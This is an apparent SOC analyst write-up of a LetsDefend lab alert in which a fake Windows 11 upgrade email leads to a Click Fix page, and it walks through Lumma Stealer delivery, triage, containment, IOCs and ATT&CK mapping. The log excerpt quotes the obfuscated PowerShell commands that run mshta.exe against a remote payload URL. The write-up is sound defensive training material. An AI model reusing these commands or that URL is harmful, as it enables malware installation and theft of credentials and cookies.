Skip to main content

LD-Lumma Stealer - DLL Side-Loading via Click Fix Phishing

Table of Contents

Alert
#

 1EventID :              316
 2Event Time :           Mar, 13, 2025, 09:44 AM
 3Rule :                 SOC338 - Lumma Stealer - DLL Side-Loading via Click Fix Phishing
 4Level :                Security Analyst
 5SMTP Address :         132.232.40.201
 6Source Address :       update@windows-update.site
 7Destination Address :  dylan@letsdefend.io
 8E-mail Subject :       Upgrade your system to Windows 11 Pro for FREE
 9Device Action :        Allowed
10Trigger Reason :       Redirected site contains a click fix type script for Lumma Stealer distribution.

Identification
#

What was the delivery vector?
#

The phishing email arrived from update@windows-update.site (SMTP 132.232.40.201) to dylan@letsdefend.io at 09:44 AM - nearly 14 hours before execution, suggesting the user opened it later in the day. The email body impersonated an official Microsoft notification offering a free Windows 11 Pro upgrade with a prominent “UPDATE NOW” button.

Phishing email body

The “UPDATE NOW” button linked to https://www.windows-update.site/. I checked the domain on VirusTotal - 11/95 vendors flagged it as malicious.

VirusTotal - windows-update.site

Did the user interact?
#

Proxy logs confirmed that at Mar 13, 2025, 23:26 Dylan’s host (172.16.17.216) accessed https://windows-update.site/ with a referrer of https://mail.letsdefend.io/ - confirming the user clicked the link directly from webmail.

Proxy log - URL access

What type of attack was attempted?
#

This is a Click Fix phishing attack - a technique where a malicious webpage presents a fake CAPTCHA or verification prompt instructing the user to manually copy and paste a PowerShell command into a Run dialog or terminal. The “I am not a robot - reCAPTCHA Verification ID” string embedded in the command confirms this pattern. The page presented the user with an obfuscated command disguised as a verification step:

 1Mar 13 2025 23:26:19
 2"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 powershell -Command
 3('ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4' -replace ']')
 4# ✅ ''I am not a robot - reCAPTCHA Verification ID: 3824
 5
 6Mar 13 2025 23:26:31
 7"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command
 8"mshta.exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4"
 9
10Mar 13 2025 23:26:32
11"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 powershell -Command
12('ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4' -replace ']')
13# ✅ ''I am not a robot - reCAPTCHA Verification ID: 3824''

The -replace ']' call strips the bracket characters used to obfuscate mshta.exe, producing a clean command. mshta.exe is a legitimate Windows binary used to execute HTML Applications - abusing it as a LOLBin allows the attacker to fetch and execute remote content without writing a traditional executable to disk. The payload URL https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4 disguises the payload as a video file.

Network activity confirmed mshta.exe (PID 7284) made a GET request to the payload URL.

mshta.exe network activity

I submitted the URL to VirusTotal - 13/95 vendors flagged https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4 as malicious, confirming it as the Lumma Stealer payload.

VirusTotal - maloy.mp4 URL

Following mshta.exe execution, the host made connections to 132.232.40.201 (the phishing domain) and 35.190.80.1. AbuseIPDB identified 35.190.80.1 as belonging to Google LLC CDN - attackers commonly abuse legitimate CDN infrastructure to host payloads and blend C2 traffic with normal web activity.

Network connections post-execution
35.190.80.1 AbuseIPDB

Did anyone else get targeted?
#

Mail logs show the phishing email was delivered exclusively to dylan@letsdefend.io. No other recipients were identified.

Did the attack succeed?
#

The payload was downloaded and executed via mshta.exe. Lumma Stealer is a credential and data theft tool - given successful payload execution, data exfiltration should be assumed until forensic analysis confirms otherwise. The host was contained before persistent C2 communication was confirmed.

Triage Decision
#

True Positive. Click Fix phishing led to direct user execution of a PowerShell command, which launched mshta.exe to download and execute a confirmed malicious payload identified as Lumma Stealer. Escalated to L2 for memory acquisition and credential rotation.

What is the impact level?
#

High. Lumma Stealer targets browser credentials, session cookies, cryptocurrency wallets, and stored passwords. Successful execution on Dylan’s host means any credentials stored in the browser or credential manager should be considered compromised pending L2 investigation.

Containment
#

Is the attacker still active?
#

mshta.exe executed the payload and network connections to 35.190.80.1 were observed. Until L2 confirms whether Lumma Stealer established persistence or completed exfiltration, the attacker should be considered potentially active.

Is the endpoint still exposed?
#

No. Host Dylan (172.16.17.216) was isolated via the Containment toggle in the endpoint management console.

Host contained

Actions taken
#

Host Dylan (172.16.17.216) was contained. Domain windows-update[.]site and SMTP IP 132.232.40.201 were blocked at the email gateway and DNS level. Domain overcoatpassably[.]shop was blocked at the proxy. Case escalated to L2 for memory acquisition, browser credential rotation, and assessment of data exfiltration scope.

IOCs
#

TypeValueDescription
Emailupdate@windows-update[.]sitephishing sender
IP132.232.40.201phishing SMTP and domain hosting
IP35.190.80.1Google CDN - possible payload/C2 hosting
Domainwindows-update[.]sitephishing domain, 11/95 VT
URLhxxps://overcoatpassably[.]shop/Z8UZbPyVpGfdRS/maloy.mp4Lumma Stealer payload, 13/95 VT
HostDylan (172.16.17.216)compromised endpoint
Accountdylan@letsdefend.iotargeted and compromised account
Processmshta.exe PID 7284LOLBin used to fetch and execute payload

MITRE ATT&CK
#

TacticTechniqueID
Initial AccessPhishing: Spearphishing LinkT1566.002
ExecutionUser Execution: Malicious LinkT1204.001
ExecutionCommand and Scripting Interpreter: PowerShellT1059.001
Defense EvasionSystem Binary Proxy Execution: MshtaT1218.005
Defense EvasionObfuscated Files or InformationT1027
Credential AccessSteal Web Session CookieT1539
CollectionData from Local SystemT1005
Command and ControlIngress Tool TransferT1105